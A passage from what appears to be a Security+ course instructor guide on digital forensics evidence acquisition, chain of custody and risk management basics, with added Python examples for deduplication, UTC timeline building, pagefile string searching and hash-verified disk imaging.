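def tag_files(files, candidates, rules):
    """Apply standardized tags to each remaining file based on case-insensitive keyword matches."""
    tags = {}
    for path in candidates.values():
        content = files[path].lower()
        tags[path] = sorted(tag for tag, keywords in rules.items()
                            if any(kw in content for kw in keywords))
    return tags


def process_case(files=SAMPLE_FILES, known_hashes=KNOWN_FILE_HASHES, rules=TAG_RULES):
    """Run the de-duplicate -> filter -> tag pipeline and return a summary for the reviewer."""
    unique, duplicates = deduplicate(files)
    for_review = filter_known(unique, known_hashes)
    return {
        "unique_files": len(unique),
        "duplicates_removed": sum(len(paths) for paths in duplicates.values()),
        "known_files_removed": len(unique) - len(for_review),
        "for_review": sorted(for_review.values()),
        "tags": tag_files(files, for_review, rules),
    }


if __name__ == "__main__":
    for key, value in process_case().items():
        print(f"{key}: {value}")
```

Hashing content rather than comparing names is what lets the pipeline recognize that "budget (copy).xlsx" is the same evidence as "budget.xlsx" and that the notepad.exe on the desktop is a standard OS file; in a real review the duplicate paths are still recorded, because where a copy was found can itself be relevant.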

Video and Witness Interviews
Show Slide(s): Video and Witness Interviews

The first phase of a forensics investigation is to document the scene. The crime scene
must be recorded using photographs and ideally audio and video. Investigators must
capture every action they take in identifying, collecting, and handling evidence.

Remember that if the matter comes to trial, the trial could take place months or years after
the event. It is vital to record impressions and actions in notes. Also consider that in-place
CCTV systems or webcams might have captured valuable evidence.

If possible, evidence is gathered from the live system using forensic software tools. It is
vital that these tools do as little to modify the digital data that they capture as possible.
As well as digital evidence, an investigator should interview witnesses to establish
what they were doing at the scene, whether they observed any suspicious behavior or
activity, and also to gather information about the computer system. An investigator
might ask questions informally and record the answers as notes to gain an initial
understanding of the circumstances surrounding an incident. An investigator must
ask questions carefully, to ensure that the witness is giving reliable information and
to avoid leading the witness to a particular conclusion. Making an audio or video
recording of witness statements produces a more reliable record but may make
witnesses less willing to make a statement. If a witness needs to be compelled to make
a statement, there will be legal issues around employment contracts (if the witness is
an employee) and right to legal representation.

Timelines
Show Slide(s): Timelines

A significant part of a forensic investigation will involve tying events to specific times
to establish a consistent and verifiable narrative. The visual representation of events
happening in chronological order is called a timeline.
Operating systems and file systems use a variety of methods to identify the time at
which something occurred. The benchmark time is Coordinated Universal Time (UTC),
which is essentially the time at the Greenwich meridian. Local time is the time within a
particular time zone, which will be offset from UTC by several hours (or in some cases,
half hours). The local time offset may also vary if a seasonal daylight saving time is in
place.
NTFS uses UTC internally, but many OS and file systems record time stamps as the
local system time. When collecting evidence, it is vital to establish how a time stamp is
calculated and note the offset between the local system time and UTC.
Forensics also needs to consider that a host's system clock may not be properly
synchronized to a valid time source or may have been tampered with. Most computers
are configured to synchronize the clock to a Network Time Protocol (NTP) server.
Closely synchronized time is important for authentication and audit systems to work
properly. The right to modify a computer's time would normally be restricted to
administrator-level accounts on enterprise networks, and time change events should
be logged.
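The offset and clock-synchronization issues described above are the reason a timeline is normally built by normalizing every source to UTC first. The following is an added example written for this guide (not a tool from the text); the four events, their hosts, the UTC offsets, and the 90-second clock error measured on the firewall are all constructed sample data. It generalizes the point in the text slightly by also correcting a host whose clock was found to be running fast against a trusted NTP reference.

```python
from datetime import datetime, timedelta, timezone

# Constructed sample events. Each record is:
#   (source, timestamp as recorded on that host, UTC offset in hours established for that host,
#    measured clock error of the host in seconds: positive means the clock ran fast)
SAMPLE_EVENTS = [
    ("file server, NTFS $MFT (stored as UTC)", "2021-03-14 10:02:11", 0.0, 0),
    ("workstation syslog (local time, US Eastern, DST in effect)", "2021-03-14 06:01:55", -4.0, 0),
    ("branch firewall (local time, India Standard Time)", "2021-03-14 15:31:40", 5.5, 90),
    ("workstation syslog (local time, US Eastern, DST in effect)", "2021-03-14 06:03:20", -4.0, 0),
]


def to_utc(raw: str, offset_hours: float, clock_skew_seconds: int = 0) -> datetime:
    """Convert a naive local timestamp to an aware UTC datetime.

    offset_hours is the host's UTC offset (half-hour zones are fine, e.g. +5.5).
    clock_skew_seconds corrects a host clock that was found to be out of step
    with a trusted time source (positive = host clock ahead of true time).
    """
    local_zone = timezone(timedelta(hours=offset_hours))
    local = datetime.strptime(raw, "%Y-%m-%d %H:%M:%S").replace(tzinfo=local_zone)
    return local.astimezone(timezone.utc) - timedelta(seconds=clock_skew_seconds)


def build_timeline(events=SAMPLE_EVENTS):
    """Normalize every event to UTC and return rows in chronological order."""
    rows = []
    for source, raw, offset_hours, skew in events:
        utc = to_utc(raw, offset_hours, skew)
        rows.append((utc.strftime("%Y-%m-%dT%H:%M:%SZ"), source, raw,
                     f"UTC{offset_hours:+.1f}", skew))
    return sorted(rows)  # ISO 8601 UTC strings sort chronologically


if __name__ == "__main__":
    for utc, source, raw, offset, skew in build_timeline():
        print(f"{utc}  {source}  (recorded {raw} {offset}, clock skew {skew:+d}s)")
```

Note that the raw timestamps alone would put the firewall event last (15:31) and the file server event in the middle (10:02); after normalization the firewall event is actually the earliest, and the 90-second correction moves it earlier still. Both the recorded value and the offset applied are kept in each row so the conversion can be shown and repeated in court.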


Using Autopsy to generate a timeline of events from a disk image.
(Screenshot: Autopsy, the Sleuth Kit sleuthkit.org/autopsy.)

Event Logs and Network Traffic
Show Slide(s): Event Logs and Network Traffic

Digital evidence is not just drawn from analysis of host system memory and data
drives. An investigation may also obtain the event logs for one or more network
appliances and/or server hosts. Similarly, network packet captures and traces/flows
might provide valuable evidence. On a typical network, sensor and logging systems are
not configured to record all network traffic, as this would generate a very considerable
amount of data. On the other hand, an organization with sufficient IT resources could
choose to preserve a huge amount of data. A Retrospective Network Analysis (RNA)
solution provides the means to record network events at either a packet header or
payload level.
For forensics, data records that are not supported by physical evidence (a data drive)
must meet many tests to be admissible in court. For event logs, the drives might not
be accessible or might no longer hold the original logs; for network traffic, there is no
physical evidence. Where logs and network traffic are captured in a SIEM, the SIEM
should demonstrate accuracy (that all relevant data was captured) and integrity (that
neither party could have tampered with the data).

Strategic Intelligence and Counterintelligence
Show Slide(s): Strategic Intelligence and Counterintelligence

In some cases, an organization may conduct a forensics investigation without the
expectation of legal action. As well as being used in a legal process, forensics has a
role to play in cybersecurity. It enables the detection of past intrusions or ongoing but
unknown intrusions by close examination of available digital evidence. A famous quote
attributed to former Cisco CEO John Chambers illustrates the point: "There are two
types of companies: those that have been hacked, and those who don't know they have
been hacked."


Digital forensics can be used for information gathering to protect against espionage
and hacking. This intelligence is deployed in two different ways:
• Counterintelligence: identification and analysis of specific adversary tactics,
techniques, and procedures (TTP) provides information about how to configure
and audit active logging systems so that they are most likely to capture evidence of
attempted and successful intrusions.

• Strategic intelligence: data and research that has been analyzed to produce
actionable insights. These insights are used to inform risk management and security
control provisioning to build mature cybersecurity capabilities.


Review Activity:
Digital Forensics Documentation
Answer the following questions:

1. What is the significance of the fact that digital evidence is latent?

The evidence cannot be seen directly but must be interpreted, so the validity of the
interpreting process must be unquestionable.

2. What should be the first action at a crime scene during a forensic
investigation?

Preserve the crime scene by recording everything as is, preferably on video.

3. Why might a file time stamp not show the time at which a crime was
committed?

The time stamp may record the Universal Coordinated Time rather than the local time.
An offset would need to be applied (and it might need to be demonstrated that the
computer's time zone was correctly set).

4. You've fulfilled your role in the forensic process and now you plan on
handing the evidence over to an analysis team. What important process
should you observe during this transition and why?

It's important to uphold a record of how evidence is handled in a chain of custody. The
chain of custody will help verify that everyone who handled the evidence is accounted
for, including when the evidence was in each person's custody. This is an important
tool in validating the evidence's integrity.


Topic 18B
Explain Key Aspects of Digital Forensics Evidence Acquisition

EXAM OBJECTIVES COVERED
4.1 Given a scenario, use the appropriate tool to assess organizational security
4.5 Explain the key aspects of digital forensics

Teaching Tip: This topic deals with more practical issues around evidence collection and
integrity, plus use of the forensics tools from objective 4.1.

There are many processes and tools for acquiring different kinds of digital evidence
from computer hosts and networks. These processes must demonstrate exactly how
the evidence was acquired and that it is a true copy of the system state at the time
of the event. While you may not be responsible for leading evidence acquisition,
you should be familiar with the processes and tools used, so that you can provide
assistance as required.

Data Acquisition and Order of Volatility
Show Slide(s): Data Acquisition and Order of Volatility

Acquisition is the process of obtaining a forensically clean copy of data from a device
held as evidence. If the computer system or device is not owned by the organization,
there is the question of whether search or seizure is legally valid. This impacts bring-
your-own-device (BYOD) policies. For example, if an employee is accused of fraud
you must verify that the employee's equipment and data can be legally seized and
searched. Any mistake may make evidence gained from the search inadmissible.
Data acquisition is also complicated by the fact that it is more difficult to capture
evidence from a digital crime scene than it is from a physical one. Some evidence will
be lost if the computer system is powered off; on the other hand, some evidence may
be unobtainable until the system is powered off. Additionally, evidence may be lost
depending on whether the system is shut down or frozen by suddenly disconnecting
the power.

Teaching Tip: In practical terms, CPU registers and cache aren't accessible as sources of
forensics evidence, but advise students to learn the full order regardless. Note that there
are lots of different kinds of cache.

Data acquisition usually proceeds by using a tool to make an image from the data
held on the target device. An image can be acquired from either volatile or nonvolatile
storage. The general principle is to capture evidence in the order of volatility, from
more volatile to less volatile. The ISOC best practice guide to evidence collection
and archiving, published as tools.ietf.org/html/rfc3227, sets out the general order as
follows:
1. CPU registers and cache memory (including cache on disk controllers, GPUs, and
so on).

2. Contents of nonpersistent system memory (RAM), including routing table, ARP
cache, process table, kernel statistics.

3. Data on persistent mass storage devices (HDDs, SSDs, and flash memory devices):

• Partition and file system blocks, slack space, and free space.

• System memory caches, such as swap space/virtual memory and
hibernation files.


• Temporary file caches, such as the browser cache.

• User, application, and OS files and directories.

4. Remote logging and monitoring data.

5. Physical configuration and network topology.

6. Archival media and printed documents.

The Windows registry is mostly stored on disk, but there are keys (notably
HARDWARE) that only ever exist in memory. The contents of the registry can be analyzed via
a memory dump.

Digital Forensics Software
Show Slide(s): Digital Forensics Software

Digital forensics software is designed to assist the acquisition, documentation, and
analysis of digital evidence. Most of the commercial forensics tools are available for the
Windows platform only.
• EnCase Forensic is a digital forensics case management product created by
Guidance Software (guidancesoftware.com/encase-forensic?cmpid=nav_r). Case
management is assisted by built-in pathways, or workflow templates, showing the
key steps in diverse types of investigation. In addition to the core forensics suite, there
are separate products for e-discovery (digital evidence management) and Endpoint
Investigator (for over-the-network analysis of corporate desktops and servers).

• The Forensic Toolkit (FTK) from AccessData (accessdata.com/products-services/
forensic-toolkit-ftk) is another commercial investigation suite designed to run on
Windows Server (or server cluster).

• The Sleuth Kit (sleuthkit.org) is an open-source collection of command line tools
and programming libraries for disk imaging and file analysis. Autopsy is a graphical
front-end for these tools and acts as a case management/workflow tool. The
program can be extended with plug-ins for various analysis functions. Autopsy is
available for Windows and can be compiled from the source code to run on Linux.

• WinHex from X-Ways (x-ways.net/winhex) is a commercial tool for forensic recovery
and analysis of binary data, with support for a range of file systems and memory
dump types (depending on version).

• The Volatility Framework (github.com/volatilityfoundation/volatility) is widely used
for system memory analysis.

System Memory Acquisition
Show Slide(s): System Memory Acquisition

Teaching Tip: Remind students that there is no physical evidence to validate a system
memory image, so the provenance of the capture can only be established by video
recording the process. Note that one of the functions of EDR is to perform live memory
capture when suspicious activity is detected (carbonblack.com/blog/using-carbon-black-
with-volatility-for-detecting-memory-attacks).

System memory is volatile data held in Random Access Memory (RAM) modules.
Volatile means that the data is lost when power is removed. A system memory
dump creates an image file that can be analyzed to identify the processes that are
running, the contents of temporary file systems, registry data, network connections,
cryptographic keys, and more. It can also be a means of accessing data that is
encrypted when stored on a mass storage device. There are various methods of
collecting the contents of system memory.


Viewing the process list in a memory dump using the Volatility Framework.
(Screenshot: Volatility Framework volatilityfoundation.org.)

Live Acquisition
A specialist hardware or software tool can capture the contents of memory while the
host is running. Unfortunately, this type of tool needs to be preinstalled as it requires a
kernel mode driver to dump any data of interest. Some examples for Windows include
WinHex (x-ways.net/winhex), Memoryze from FireEye (fireeye.com/services/freeware/
memoryze.html), and F-Response TACTICAL (f-response.com/software/tac).
On Linux, a user mode tool, such as memdump (porcupine.org/forensics/tct.html)
or dd, can be run against the /dev/mem device file. However, on most modern
distributions, access to this file is blocked. The Volatility Framework (github.com/
volatilityfoundation/volatility) includes a tool to install a kernel driver (pmem).
The fmem and LiME kernel utilities provide similar functionality.

Crash Dump
When Windows encounters an unrecoverable kernel error, it can write contents of
memory to a dump file at C:\Windows\MEMORY.DMP. On modern systems, there is
unlikely to be a complete dump of all the contents of memory, as these could take up
a lot of disk space. However, even mini dump files, stored in C:\Windows\Minidumps,
may be a valuable source of information.

Hibernation File and Pagefile
A hibernation file is created on disk in the root folder of the boot volume when
a Windows host is put into a sleep state. If it can be recovered, the data can be
decompressed and loaded into a software tool for analysis. The drawback is that
network connections will have been closed, and malware may have detected the use of
a sleep state and performed anti-forensics.


The pagefile/swap file/swap partition stores pages of memory in use that exceed
the capacity of the host's RAM modules. The pagefile is not structured in a way that
analysis tools can interpret, but it is possible to search for strings.
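Searching an unstructured pagefile for strings works the same way as the Unix strings utility: scan for runs of printable bytes. On Windows much of the text in memory is UTF-16LE rather than ASCII, so a useful scanner looks for both encodings. The code below is an added example written for this guide, not a tool from the text; the blob it scans is a constructed stand-in for a pagefile fragment, and the keywords are constructed examples of what an investigator might search for.

```python
import re

# Constructed sample blob standing in for a fragment of a pagefile: binary junk
# interleaved with ASCII and UTF-16LE text, as Windows memory typically holds both.
SAMPLE_BLOB = (
    b"\x00\x01\x02\xff"
    + b"POST /upload HTTP/1.1"
    + b"\x00\x00\x9a"
    + "Connected to ftp.example.net".encode("utf-16le")
    + b"\x13\x37ab\x00"
    + b"C:\\Users\\alice\\Documents\\secret.docx"
    + b"\xde\xad"
)


def ascii_strings(blob: bytes, min_len: int = 6):
    """Runs of printable ASCII of at least min_len bytes (the classic 'strings' behaviour)."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(blob)]


def utf16le_strings(blob: bytes, min_len: int = 6):
    """Runs of printable characters encoded as UTF-16LE (each ASCII byte followed by a NUL)."""
    pattern = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    return [m.group().decode("utf-16le") for m in pattern.finditer(blob)]


def search_blob(blob: bytes = SAMPLE_BLOB, keywords=("example.net", "\\users\\"), min_len: int = 6):
    """Extract both string encodings and report which ones contain a keyword (case-insensitive)."""
    found = [("ascii", s) for s in ascii_strings(blob, min_len)]
    found += [("utf-16le", s) for s in utf16le_strings(blob, min_len)]
    hits = [(enc, s) for enc, s in found
            if any(kw.lower() in s.lower() for kw in keywords)]
    return {"strings": found, "hits": hits}


if __name__ == "__main__":
    for encoding, text in search_blob()["strings"]:
        print(f"[{encoding}] {text}")
```

The ASCII scanner alone would miss the UTF-16LE connection string entirely, because every character in it is separated by a NUL byte; that is why forensic string tools offer a "wide" or Unicode mode. The minimum length keeps short accidental runs of printable bytes out of the output.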

Disk Image Acquisition
Show Slide(s): Disk Image Acquisition

Disk image acquisition refers to acquiring data from nonvolatile storage. Nonvolatile
storage includes hard disk drives (HDDs), solid state drives (SSDs), firmware, other
types of flash memory (thumb drives and memory cards), and optical media (CD,
DVD, and Blu-Ray). This can also be referred to as device acquisition, meaning the SSD
storage in a smartphone or media player. Disk acquisition will also capture the OS
installation, if the boot volume is included.
There are three device states for persistent storage acquisition:
• Live acquisition: this means copying the data while the host is still running. This
may capture more evidence or more data for analysis and reduce the impact on
overall services, but the data on the actual disks will have changed, so this method
may not produce legally acceptable evidence. It may also alert the adversary and
allow time for them to perform anti-forensics.
• Static acquisition by shutting down the host: this runs the risk that the malware will
detect the shutdown process and perform anti-forensics to try to remove traces of
itself.
• Static acquisition by pulling the plug: this means disconnecting the power at the
wall socket (not the hardware power-off button). This is most likely to preserve the
storage devices in a forensically clean state, but there is the risk of corrupting data.
Given sufficient time at the scene, you may decide to perform both a live and static
acquisition. Whichever method is used, it is imperative to document the steps taken
and supply a timeline for your actions.
There are many OS imaging utilities, including those packaged with suites such as the
Forensic Toolkit and its FTK Imager. You should note that the EnCase forensics suite
uses a vendor file format (.e01) compared to the raw file format used by Linux tools
like dd. The file format is important when it comes to selecting a tool for analyzing the
image. The .e01 format allows image metadata (such as the checksum, drive geometry,
and acquisition time) to be stored within the same file. The open-source Advanced
Forensic Format (AFF) provides similar features.
If no specialist tool is available, on a Linux host you can use the dd command to make
a copy of an input file (if=) to an output file (of=) and apply optional conversions to
the file data. In the following, sda is the fixed drive:
dd if=/dev/sda of=/mnt/usbstick/backup.img
A more recent fork of dd is dc3dd, which provides additional features like multiple
output files and exact match verification.

Using dc3dd (a version of dd with additional forensics functionality created by the DoD)
and generating a hash of the source-disk data (sda).


Show Slide(s): Preservation and Integrity of Evidence

Preservation and Integrity of Evidence

It is vital that the evidence collected at the crime scene conform to a valid timeline.
Digital information is susceptible to tampering, so access to the evidence must be
tightly controlled. Recording the whole process establishes the provenance of the
evidence as deriving directly from the crime scene.

To obtain a forensically sound image from nonvolatile storage, you need to ensure that
nothing you do alters data or metadata properties on the source disk or file system. A
write blocker assures this process by preventing any data on the disk or volume from
being changed by filtering write commands at the driver and OS level. Data acquisition
would normally proceed by attaching the target device to a forensics workstation or
field capture device equipped with a write blocker.

Teaching Tip: Note that imaging tools make bit-level copies of the media. They do not
use the file system to mediate access. This allows them to capture artifacts that may be
hidden from the file system. If necessary, remind students how cryptographic hash
functions prove integrity.

Data Acquisition with Integrity and Non-Repudiation

Once the target disk has been safely attached to the forensics workstation, data
acquisition proceeds as follows:

1. A cryptographic hash of the disk media is made, using either the MD5 or SHA
hashing function. The output of the function can be described as a checksum.
2. A bit-by-bit copy of the media is made using the imaging utility.

3. A second hash is then made of the image, which should match the original hash
of the media.

4. A copy is made of the reference image, validated again by the checksum. Analysis
is performed on the copy.

This proof of integrity ensures non-repudiation. If the provenance of the evidence
is certain, the threat actor identified by analysis of the evidence cannot deny their
actions. The checksums prove that no modification has been made to the image.

In practical terms, the image acquisition software will perform the verification steps as part
of the acquisition process, but in theory you could use separate tools to perform each stage
individually.
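The four acquisition steps above, worked through in Python as an added example (this is not code from the guide). It uses an ordinary file as a stand-in for /dev/sda so it runs anywhere, defaults to SHA-256, and the sample media content is constructed.

```python
"""Hash-verified disk acquisition, following the four steps in the text.

Added example, not from the CompTIA guide. A plain file stands in for /dev/sda;
the block copy loop is what dd if=<source> of=<image> does, and the hashes are
what an imaging tool records to prove the image matches the media.
"""
import hashlib
import os
import shutil
import tempfile

BLOCK_SIZE = 512  # sector-sized reads, as dd uses by default (bs=512)


def hash_file(path, algorithm="sha256"):
    """Steps 1 and 3: checksum a whole file (media or image) block by block."""
    digest = hashlib.new(algorithm)
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(BLOCK_SIZE), b""):
            digest.update(block)
    return digest.hexdigest()


def bit_copy(source, destination):
    """Step 2: copy every block of the source; no file system mediates access."""
    with open(source, "rb") as src, open(destination, "wb") as dst:
        for block in iter(lambda: src.read(BLOCK_SIZE), b""):
            dst.write(block)


def acquire(source, image, algorithm="sha256"):
    """Run steps 1-3 and report whether the image hash matches the media hash."""
    media_hash = hash_file(source, algorithm)  # 1. hash the media first
    bit_copy(source, image)                    # 2. make the bit-by-bit image
    image_hash = hash_file(image, algorithm)   # 3. hash the image independently
    return {
        "algorithm": algorithm,
        "media_hash": media_hash,
        "image_hash": image_hash,
        "verified": media_hash == image_hash,
    }


def working_copy(reference_image, copy_path, expected_hash, algorithm="sha256"):
    """Step 4: copy the reference image and re-validate it against the recorded
    checksum. Analysis is done on this copy, never on the reference image."""
    bit_copy(reference_image, copy_path)
    return hash_file(copy_path, algorithm) == expected_hash


def run_demo():
    """Acquire a constructed 'disk', make a working copy, then show that a
    single changed byte in another copy is caught by the checksum."""
    workdir = tempfile.mkdtemp(prefix="acq-")
    try:
        source = os.path.join(workdir, "sda.bin")  # constructed stand-in for /dev/sda
        image = os.path.join(workdir, "backup.img")
        good_copy = os.path.join(workdir, "working.img")
        bad_copy = os.path.join(workdir, "tampered.img")

        # Constructed sample media: a label, four runs of all byte values, zero padding.
        with open(source, "wb") as fh:
            fh.write(b"CONSTRUCTED EVIDENCE DISK\n" + bytes(range(256)) * 4)
            fh.write(b"\x00" * (BLOCK_SIZE * 8 - fh.tell()))

        result = acquire(source, image)
        copy_ok = working_copy(image, good_copy, result["media_hash"])

        # Flip one bit in a second copy: the recorded checksum no longer matches.
        shutil.copyfile(image, bad_copy)
        with open(bad_copy, "r+b") as fh:
            fh.seek(1000)
            original = fh.read(1)
            fh.seek(1000)
            fh.write(bytes([original[0] ^ 0x01]))
        tampered_ok = hash_file(bad_copy) == result["media_hash"]

        return {"acquisition": result, "working_copy_ok": copy_ok,
                "tampered_copy_ok": tampered_ok}
    finally:
        shutil.rmtree(workdir, ignore_errors=True)


if __name__ == "__main__":
    outcome = run_demo()
    print("media hash      :", outcome["acquisition"]["media_hash"])
    print("image hash      :", outcome["acquisition"]["image_hash"])
    print("image verified  :", outcome["acquisition"]["verified"])
    print("working copy ok :", outcome["working_copy_ok"])
    print("tampered copy ok:", outcome["tampered_copy_ok"])
```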

Preservation of Evidence

The host devices and media taken from the crime scene should be labeled, bagged,
and sealed, using tamper-evident bags. It is also appropriate to ensure that the
bags have antistatic shielding to reduce the possibility that data will be damaged
or corrupted on the electronic media by electrostatic discharge (ESD). Each piece of
evidence should be documented by a chain of custody form which records where,
when, and who collected the evidence, who subsequently handled it, and where it
was stored.

The evidence should be stored in a secure facility; this not only means access control,
but also environmental control, so that the electronic systems are not damaged by
condensation, ESD, fire, and other hazards. Similarly, if the evidence is transported, the
transport must also be secure.

Show Slide(s): Acquisition of Other Data

Acquisition of Other Data

There are other potential sources of forensic data within computer systems and
networks, though they can be hard to acquire or to prove as admissible.


Network

Packet captures and traffic flows can contain very valuable evidence, if the capture was
running at the right time and in the right place to record the incident. As with memory
forensics, the issue for forensics lies in establishing the integrity of the data. Most
network data will come from a SIEM.

Cache

Cache can refer either to hardware components or software. Software-based cache is
stored in the file system and can be acquired as part of a disk image. For example, each
browser has a cache of temporary files, and each user profile has a cache of temp files.
Some cache artifacts generated by the OS and applications are held in memory only,
such as portions of the registry, cryptographic keys, password hashes, some types of
cookies, and so on. The contents of hardware cache (CPU registers and disk controller
read/write cache, for instance) is not generally recoverable.

Artifacts and Data Recovery

Artifacts refers to any type of data that is not part of the mainstream data structures
of an operating system. For example, the Windows Alternate Data Streams (ADS)
feature is often used to conceal file data, and various caches, such as prefetch and
Amcache, can be used to find indicators of suspicious process behavior.

Data recovery refers to analyzing a disk or image of a disk for file fragments stored in
slack space. These fragments might represent deleted or overwritten files. The process
of recovering them is referred to as carving.

Using Autopsy for file carving a disk image. The selected Courses folder and the PDF files in it were deleted
and so are flagged as unallocated. Because this image was captured soon after deletion, the file contents
are easily recoverable, however. (Screenshot Autopsy The Sleuth Kit sleuthkit.org/autopsy.)

Snapshot

A snapshot is a live acquisition image of a persistent disk. While this may have less
validity than an image taken from a device using a write blocker, it may be the only
means of acquiring data from a virtual machine or cloud process.


Firmware

Firmware is usually implemented as flash memory. Some types, such as the PC
firmware, can potentially be extracted from the device or from system memory using
an imaging utility. It likely will be necessary to use specialist hardware to attach the
device to a forensic workstation, however.

Show Slide(s): Digital Forensics for Cloud

Digital Forensics for Cloud

With an on-premises investigation, the right to seize and analyze devices is usually
fairly unproblematic. There may be availability issues with taking a system out of
service, and bring your own device policies can be more complex, but essentially as all
the equipment is the company's property, there are no third-party obstacles.

While companies can operate private clouds, forensics in a public cloud are
complicated by the right to audit permitted to you by your service level agreement
(SLA) with the cloud provider. Two more issues with forensics investigations of cloud-
hosted processing and data services are as follows:

• The on-demand nature of cloud services means that instances are often created
and destroyed again, with no real opportunity for forensic recovery of any data.
Cloud providers can mitigate this to some extent with extensive logging and
monitoring options. A CSP might also provide an option to generate file system
and memory snapshots from containers and VMs in response to an alert condition
generated by a SIEM.

• Chain of custody issues are complex and might have to rely on the CSP to select and
package data for you. The process should be documented and recorded as closely
as is possible.

• Jurisdiction and data sovereignty may restrict what evidence the CSP is willing to
release to you.

• If the CSP is a data processor, it will be bound by data breach notification laws and
regulations. Coordinating the timing of notification and contact with the regulator
between your organization and the CSP can be extremely complex, especially if
there is an ongoing incident requiring confidentiality.

Teaching Tip: Note that these issues have to be considered and resolved well in
advance of an actual incident.


Review Activity:
Digital Forensics Evidence Acquisition

Answer the following questions:

1. You must recover the contents of the ARP cache as vital evidence of a
man-in-the-middle attack. Should you shut down the PC and image the hard drive
to preserve it?

No, the ARP cache is stored in memory and will be discarded when the computer is
powered off. You can either dump the system memory or run the arp utility and make
a screenshot. In either case, make sure that you record the process and explain your
actions.

2. Which command line tool allows image creation from disk media on any
Linux host?

The dd tool is installed on all Linux distributions.

3. True or False? To ensure evidence integrity, you must make a hash of the
media before making an image.

True.

4. What type of forensic data is recovered using a carving tool?

A carving tool allows close inspection of an image to locate artifacts. Artifacts are data
objects and structures that are not obvious from examination by ordinary file browsing
tools, such as alternate data streams, cache entries, and deleted file remnants.


Lesson 18
Summary

You should be able to explain key aspects of digital forensics, including the secure
acquisition and handling of evidence.

Teaching Tip: Check that students are confident about the content that has been
covered. If there is time, revisit any content examples that they have questions about.
If you have used all the available time for this lesson block, note the issues, and
schedule time for a review later in the course.

Guidelines for Digital Forensics

Follow these guidelines for supporting forensics investigations:

• Develop or adopt a consistent process for incident responders to handle and
preserve forensic data:

  • Consider the order of volatility and potential loss of evidence if a host is shut
  down or powered off.

  • Record evidence collection using video and interview witnesses to gather
  statements.

  • Deploy tools, such as WinHex, Autopsy, or FTK Imager, that can capture and
  validate evidence from persistent and nonpersistent media.

  • Establish a method for recovering forensic data from a CSP.

• Document evidence using a chain of custody.

• Be aware of the potential for forensic evidence as a source of strategic intelligence
and counterintelligence.

Lesson 19
Summarizing Risk Management Concepts

LESSON INTRODUCTION

If a company operates with one or more vulnerable business processes, it could result
in disclosure, modification, loss, destruction, or interruption of critical data or it could
lead to loss of service to customers. Quite apart from immediate financial losses arising
from such security incidents, either outcome will reduce a company's reputation. If a
bank lost its trading floor link to its partners, even for an hour, since the organization's
primary function (trading) would be impossible, huge losses may result. Consequently,
when planning a network or other IT system, you must perform risk management to
assess threats and vulnerabilities.

Analyzing risk plays a major role in ensuring a secure environment for an organization.
By assessing and identifying specific risks that can cause damage to network
components, hardware, and personnel, you can mitigate possible threats and establish
the right corrective measures to avoid losses and liabilities.

Teaching Tip: This lesson returns to the "identify" function. While we have already
examined practical security assessment tools and procedures, this lesson considers
wider ERM processes.

Lesson Objectives
In this lesson, you will:
• Explain risk management processes and concepts.

• Explain business impact analysis concepts.


Topic 19A
Explain Risk Management Processes and Concepts

EXAM OBJECTIVES COVERED
5.4 Summarize risk management processes and concepts

Teaching Tip: This topic shows how cybersecurity procedures fit within an overall risk
management process.

Most organizations have formal risk management policies and processes, both to
meet compliance requirements and to make the business secure. These policies and
processes are usually driven by frameworks and come with some standard terminology
to describe factors and procedures within the overall process. It is vital that you be
able to summarize the key concepts of risk management, so that you can participate in
these important assessments.

Show Slide(s): Risk Management Processes

Risk Management Processes

Risk management is a process for identifying, assessing, and mitigating vulnerabilities
and threats to the essential functions that a business must perform to serve its
customers. You can think of this process as being performed over five phases:

1. Identify mission essential functions: mitigating risk can involve a large amount
of expenditure so it is important to focus efforts. Effective risk management must
focus on mission essential functions that could cause the whole business to fail if
they are not performed. Part of this process involves identifying critical systems
and assets that support these functions.

2. Identify vulnerabilities: for each function or workflow (starting with the most
critical), analyze systems and assets to discover and list any vulnerabilities or
weaknesses to which they may be susceptible.

3. Identify threats: for each function or workflow, identify the threat sources and
actors that may take advantage of or exploit or accidentally trigger vulnerabilities.

4. Analyze business impacts: the likelihood of a vulnerability being activated as a
security incident by a threat and the impact of that incident on critical systems are
the factors used to assess risk. There are quantitative and qualitative methods of
analyzing impacts and likelihood.

5. Identify risk response: for each risk, identify possible countermeasures and
assess the cost of deploying additional security controls. Most risks require some
sort of mitigation, but other types of response might be more appropriate for
certain types and level of risks.

For each business process and each threat, you must assess the degree of risk that
exists. Calculating risk is complex, but the two main variables are likelihood and impact:

• Likelihood of occurrence is the probability of the threat being realized.

• Impact is the severity of the risk if realized as a security incident. This may be
determined by factors such as the value of the asset or the cost of disruption if the
asset is compromised.


Risk management is complex and treated very differently in companies and institutions
of different sizes, and with different regulatory and compliance requirements. Most
companies will institute enterprise risk management (ERM) policies and procedures,
based on frameworks such as NIST's Risk Management Framework (RMF) or ISO 31K.
These legislative and framework compliance requirements are often formalized as
a Risk and Control Self-Assessment (RCSA). An organization may also contract an
external party to lead the process, in which case it is referred to as a Risk and Control
Assessment (RCA).

An RCSA is an internal process undertaken by stakeholders to identify risks and the
effectiveness with which controls mitigate those risks. RCSAs are often performed
through questionnaires and workshops with department managers. The outcome of an
RCSA is a report. Up-to-date RCSA reports are critical to the external audit process.

Show Slide(s): Risk Types

Risk Types

General types of risks can be identified as arising from specific threat and vulnerability
scenarios.

External

External threat actors are one highly visible source of risk. You must also consider
wider threats than those of cyberattack. Natural disasters, such as the COVID-19
pandemic, illustrate the need to have IT systems and workflows that are resilient to
widespread dislocation. The most critical type of impact is one that could lead to loss
of life or critical injury. The most obvious risks to life and safety come from natural
disasters, person-made disasters, and accidents, such as fire.

Internal

Internal risks come from assets and workflows that are owned and managed by your
organization. When reviewing internal risks, it is important to remember that these can
be classed as malicious and accidental (or non-malicious). Internal threats can include
contractors granted temporary access.

Multiparty

Multiparty risk is where an adverse event impacts multiple organizations. Multiparty
risk usually arises from supplier relationships. If a critical event disrupts a supplier or
customer, then your own organization will suffer. These are often described as ripple
impacts. For example, if one of your top five customers goes out of business because
of a data breach, your company will lose substantial revenue. Organizations in these
supply chain relationships have an interest in promoting cybersecurity awareness and
capability throughout the chain.

As an illustration of how risk assessments can change in view of multiparty
relationships, consider a company that makes wireless adapters, originally for use
with laptops. In the original usage, the security of the firmware upgrade process is
important, but it has no impact on life or safety. The company, however, earns a
